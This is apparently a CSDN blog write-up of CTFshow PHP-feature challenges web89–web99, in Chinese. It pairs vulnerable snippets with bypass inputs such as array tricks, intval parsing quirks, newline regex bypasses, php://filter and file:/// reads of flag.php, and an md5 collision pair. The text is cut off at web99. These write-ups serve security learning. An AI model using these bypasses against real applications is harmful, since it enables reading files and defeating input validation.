[基础补漏]CTFshow php特性篇(待续)

最新推荐文章于 2024-07-13 11:40:41 发布
最新推荐文章于 2024-07-13 11:40:41 发布
阅读量758 收藏 1
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lllffg/article/details/115307324
版权
本文详细介绍了CTF比赛中涉及的PHP特性及其在安全漏洞利用上的技巧,包括数组绕过正则、intval函数的巧妙利用、换行绕过、文件包含、变量覆盖等,适合PHP安全学习者参考。
摘要由CSDN通过智能技术生成

web89

考点:数组绕过正则表达式

include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
   
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
   
        die("no no no!");
    }
    if(intval($num)){
   
        echo $flag;
    }
}

直接数组绕过

<?php
$num = array('A');
print(intval($num));
//1
?>

?num[]=1

web90

考点:intval函数的小trick

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
   
    $num = $_GET['num'];
    if($num==="4476"){
   
        die("no no no!");
    }
    if(intval($num,0)===4476){
   
        echo $flag;
    }else{
   
        echo intval($num,0);
    }
}

第一种解

intval是取整数,直接float绕过

?num=4476.1

第二种解

intval遇到字符会停止,可以在后面加一个字符绕过

?num=4476e

第三种解

intval第一位如果遇到空格会默认继续读取,在前面加一个空格绕过

?num=%204476

web91

考点:换行绕过正则匹配

show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
   
    if(preg_match('/^php$/i', $a)){
   
        echo 'hacker';
    }
    else{
   
        echo $flag;
    }
}
else{
   
    echo 'nonononono';
}

第一个使用多行匹配,第二个未使用,直接换行符绕过

?cmd=php%0a%0b

web92

考点:intval函数的小trick

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
   
    $num = $_GET['num'];
    if($num==4476){
   
        die("no no no!");
    }
    if(intval($num,0)==4476){
   
        echo $flag;
    }else{
   
        echo intval($num,0);
    }
}

第一种解:

老手法,float绕过

第二种解:

intval会把e当做科学计数法

?num=4476e213

web93

考点:intval函数的小trick

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
   
    $num = $_GET['num'];
    if($num==4476){
   
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
   
        die("no no no!");
    }
    if(intval($num,0)==4476){
   
        echo $flag;
    }else{
   
        echo intval($num,0);
    }
}

第一种解:

仍可以float类型绕

?num=4476.1

第二种解:

intval可以解析二进制八进制十六进制等等

这里可以直接八进制绕过

?num=010574

web94

考点:intval函数的小trick + strpos小trick

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
   
    $num = $_GET['num'];
    if($num==="4476"){
   
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
   
        die("no no no!");
    }
    if(!strpos($num, "0")){
   
        die("no no no!");
    }
    if(intval($num,0)===4476){
   
        echo $flag;
    }
}

第一种解:

float继续梭

?num=4476.0

第二种解:

八进制配合%0a换行直接梭,strpos不会匹配换行后的内容

?num=%0a010574

第三种解:

空格配合八进制

?num=%20010574

web95

考点:intval函数的小trick + strpos小trick

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
   
    $num = $_GET['num'];
    if($num==4476){
   
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
   
        die("no no no!!");
    }
    if(!strpos($num, "0")){
   
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
   
        echo $flag;
    }
}

第一种解:

八进制配合%0a换行直接梭,strpos不会匹配换行后的内容

第二种解:

空格配合八进制

第三种解:

?num=+010574

web96

考点:highlight_file对目录处理上的小trick

highlight_file(__FILE__);

if(isset($_GET['u'])){
   
    if($_GET['u']=='flag.php'){
   
        die("no no no");
    }else{
   
        highlight_file($_GET['u']);
    }
}

文件包含的一些小细节

?u=./flag.php
?u=/1/../flag.php
?u=php://filter/read=convert.base64-encode/resource=flag.php
?u=file:///var/www/html/flag.php

web97

考点:md5处理数组上的漏洞

include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
   
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}

第一种解:

md5处理数组会返回空,直接可以绕过

[POST]
a[]=1&b[]=2

第二种解:

md5强类型碰撞

[POST]
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

web98

include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

php的三元运算

如果get传参存在,就用post传参覆盖,然后最后需要让get传参的HTTP_FLAG参数为flag

[GET]
?flag=123
[POST]
HTTP_FLAG=flag

web99

highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) {
    
    array_push($allow, rand(1</
最低0.47元/天 解锁文章
N0Tai1学习又咕了
关注
基于PHP常用字符串的总结(待续)
10-27
字符串处理是编程中的基础,无论是在网页处理还是在数据操作中都占据着举足轻重的地位。在使用这些函数时,需要注意正则表达式的书写和各函数使用参数的具体规则,以确保程序的正确执行和效率。这些函数涵盖从简单的...
ctfshow-php特性系列
qq_45951598的博客
04-10 2029
文章目录WEB89-数组绕过WEB90-intval绕过WEB91-preg_match-换行绕过WEB92-科学计数法EWEb93WEB94WEB95WEB96WEB97-MD5绕过WEB98 WEB89-数组绕过 源码: include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){
PHP CTF常见考题的绕过技巧
热门推荐
m0_48108919的博客
04-07 1万+
1.===绕过 PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。 只要两边字符串类型不同会返回false
ctfshow-web入门-php特性(web96-web99)
最新发布
Welcome To Myon'Blog !
07-13 1122
如果 $_GET 不为空,也就是说我们进行了 get 传参,那么就会通过 $_GET = &$_POST 将 $_POST 的引用赋值给 $_GET,引用赋值导致两个变量指向同一个内存地址,而 $_POST 变量内容改变会影响 $_GET 变量的内容;$_GET 变量是一个数组,预定义的 $_GET 变量用于收集来自 method="get" 的表单中的值,表单域的名称会自动成为 $_GET 数组中的键。isset()函数用于检查变量是否设置,如果设置了,则 id=$_GET['id'],否则 id=1。
[0xGameCTF 2023] web题解
rev1ve的博客
10-14 2016
分析一下,过滤了分号,空格,斜杠,flag。参数c不为数字,不等于1024,且转换为整数时等于1024;简单分析一下,首先会检测MIME类型是否正确,然后经过二次渲染上传到指定路径。查看页面源码,发现存在前端检测(所以命令执行要bp抓包)和告诉我们hint。(这里我最初上传的gif带一句话木马刚好没被改,就不用再添加一句话木马了)然后在posts文件夹找到,得到flag。我们这里用的是gif,我们先上传一下。bp抓包,添加命令得到flag。访问,命令执行得到flag。按照要求来,得到flag。
[CTFSHOW]PHP特性
Huamang的博客
03-19 1773
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 利用数组绕过:/?num[]=0 web 90 include
ctfshow web入门 php特性
Sentiment的博客
04-11 5407
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
卡马格鲁:待续
02-10
卡马格鲁 这是网站用户之间的媒体共享网站。 它包括操纵图像媒体,上传所述媒体以及...要在Linux和MAC(bitnami MAMP / WAMP目录)/php/etc/php.ini上启用邮件功能,并通过查找取消对sendmail_path = "env -i /usr/sbin
linux服务器性能调优文档(未完待续
07-23
教程名称:linux服务器性能调优文档(未完待续)课程目录:linux服务器性能调优01linux服务器性能调优02linux服务器性能调优03linux服务器性能调优04linux服务器性能调优05linux服务器性能调优06linux服务器性能调优07...
ctfshow-php特性-超详解(干货)
qq_50589021的博客
08-05 6968
PHP特性 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } ?> intval函数(获
CTF题目中遇到的PHP考点总结(一)
weixin_68789096的博客
06-24 200
文章主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。
ctfshow—PHP特性
cosmoslin的博客
09-14 2297
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
ctfshowPHP特性
遇事不决冲冲冲
08-23 4467
web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 数组绕过正则表达式,也就是说我们不按规定去
ctfshow php特性
m0_63253040的博客
08-01 330
有个正则匹配0-9数字,,输出flag的条件是要变量num为整数,直接用数组绕过就行了。
CTFSHOW WEB89-100 PHP特性 详解
qq_49399033的博客
06-14 7411
CTFSHOW PHP特性做题笔记 详细学习
ctf.show WEB入门-php特性系列
~airrudder~
09-21 2031
WEB入门 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 由于intval(array(.
ctfshow-php特性
YkingH的博客
01-26 5941
Web专项练习—ctfshow-php特性 php绕过方法总结 小数绕过 进制绕过 ==、 = ==绕过 %20空格绕过 %0a换行绕过 回车\空格+八进制绕过 相对路径绕过 php伪协议读取文件 数组md5值为0 弱类型匹配 函数写???? 运算优先级漏洞 反射类绕过 call_user_func()绕过 sha1()函数绕过 变量覆盖 sha1弱比较 md5弱比较 ereg()截断漏洞 php内置类 FilesystemIterator 压缩过滤器绕过 空格代替url ‘_’ 绕过 gettex
ctfshow-web89 (php特性)
m0_62094846的博客
01-11 354
include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } ?num[]=9 intval()函数:把八进制转化为十进制 p.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值